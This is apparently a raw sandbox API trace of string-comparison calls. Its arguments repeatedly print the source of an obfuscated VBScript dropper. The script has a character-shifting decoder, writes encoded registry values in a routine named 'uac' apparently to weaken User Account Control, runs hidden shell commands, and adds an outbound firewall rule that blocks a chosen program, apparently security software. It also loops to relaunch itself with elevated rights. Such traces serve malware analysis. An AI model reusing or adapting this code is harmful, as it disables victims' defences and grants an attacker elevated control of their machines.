bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.941] wcsncmp (_String1="- 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32 [0222.941] wcsncmp (_String1=" 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.941] wcsncmp (_String1="65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 41 [0222.942] wcsncmp (_String1="5\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 40 [0222.942] 